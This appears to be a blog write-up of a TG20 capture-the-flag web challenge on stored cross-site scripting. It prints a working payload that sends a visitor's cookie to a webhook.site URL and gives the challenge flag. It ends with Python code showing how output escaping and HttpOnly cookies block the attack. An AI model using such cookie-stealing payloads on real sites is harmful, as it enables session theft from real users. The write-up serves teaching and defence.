mrn00b0t

Interfacing between technophile and technophobe

TG20 – Exfiltration – Web Challenge – Cross Site Scripting (XSS)

I liked this challenge! I’d read a bit about different types of XSS, but it was great to see how they work in practice.

We begin presented with a blank field to enter text, and a “Send Message” button.

Examination of the HTML code reveals nothing of interest.

The first thing I attempted was a Cross Site Script (XSS). I input the following message and hit send:

hello <script>alert(1)</script>

Sure enough, the page refreshes with my message “hello”, but it also pops the alert box, so the message field is vulnerable to XSS.

I got a little lost at this point: this XSS runs client side, in the browser of whoever views the page, so how could I get it to do anything on the server?

I tried Server Side Inclusion (SSI) without success; then a teammate suggested I consider the challenge wording.

Being new to CTFs, I had assumed what you see is what you get, but it became clear that an automated browser was simulating a person visiting the page to read what was posted.

With that knowledge, a stored XSS payload was required: something saved with the message that would run in the bot’s browser when it read the page.

First we need to set up a listener to receive the exfiltrated data. I used https://webhook.site

This site provides a randomly generated URL and email address for temporary use, and logs every request made to them.

The URL is of the form httpx://webhook.site/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx


The following string redirects any visitor’s browser to our webhook site, appending their cookie to the query string so it shows up in the webhook log.

hello <script>site='httpx://webhook.site/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxx/?cookie=';cookie=document.cookie; site=site.concat(cookie); document.location=site; </script>

Once we send this message, we can return to our webhook tab, where the flag should be visible as the cookie value in the logged request:

flag=TG20{exfiltration_is_best_filtration}
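To show why the challenge worked and what would have stopped it, here is a small added example (my own code, not part of the original challenge or writeup). It models a message board that either interpolates a stored message verbatim or HTML-escapes it, and a simplified Set-Cookie header with and without HttpOnly. The payload string is a copy of the one above with the author’s placeholder webhook URL; the page template, function names and the cookie-parsing helper are assumptions for illustration.

```python
import html

# Copy of the writeup's stored payload (constructed for this example; the
# webhook URL is the placeholder used in the writeup, not a live endpoint).
STORED_PAYLOAD = (
    "hello <script>site='httpx://webhook.site/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxx/?cookie=';"
    "cookie=document.cookie; site=site.concat(cookie); document.location=site; </script>"
)

# Hypothetical page template for the challenge's message board.
PAGE_TEMPLATE = "<html><body><p>Message: {message}</p></body></html>"


def render_unsafe(message):
    """Vulnerable rendering: the stored message is dropped into the HTML verbatim,
    so a <script> element in it is executed by the bot's browser (stored XSS)."""
    return PAGE_TEMPLATE.format(message=message)


def render_safe(message):
    """Hardened rendering: escape <, >, &, and quotes so the browser displays
    the message as text instead of parsing it as markup."""
    return PAGE_TEMPLATE.format(message=html.escape(message, quote=True))


def has_script_element(rendered):
    """Crude check used here to compare the two renderings: is there still a raw
    <script ...> tag in the page that a browser would execute?"""
    return "<script" in rendered.lower()


def set_cookie_header(name, value, http_only=True):
    """Build a simplified Set-Cookie header value for the flag cookie.
    A real server would also add Path and Secure; this keeps only what the
    example needs to show."""
    attrs = [f"{name}={value}", "SameSite=Strict"]
    if http_only:
        attrs.append("HttpOnly")
    return "; ".join(attrs)


def script_visible_cookies(set_cookie_headers):
    """Simulate what document.cookie exposes: cookies marked HttpOnly are sent
    with requests but are hidden from page script, so the payload above could
    not read them."""
    visible = {}
    for header in set_cookie_headers:
        parts = [p.strip() for p in header.split(";")]
        name, _, value = parts[0].partition("=")
        flags = {p.lower() for p in parts[1:]}
        if "httponly" not in flags:
            visible[name] = value
    return visible


def demo():
    """Walk through both renderings and both cookie settings with the payload."""
    flag = "TG20{exfiltration_is_best_filtration}"
    return {
        "unsafe_runs_script": has_script_element(render_unsafe(STORED_PAYLOAD)),
        "safe_runs_script": has_script_element(render_safe(STORED_PAYLOAD)),
        "cookie_readable_without_httponly": script_visible_cookies(
            [set_cookie_header("flag", flag, http_only=False)]
        ),
        "cookie_readable_with_httponly": script_visible_cookies(
            [set_cookie_header("flag", flag)]
        ),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Either change on its own would have broken the chain in this challenge: escaping output means the bot’s browser shows the literal text of the payload rather than running it, and HttpOnly means that even a script that does run cannot read the flag from document.cookie. Real applications should do both, since escaping guards one injection point while HttpOnly limits the damage from any that are missed.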

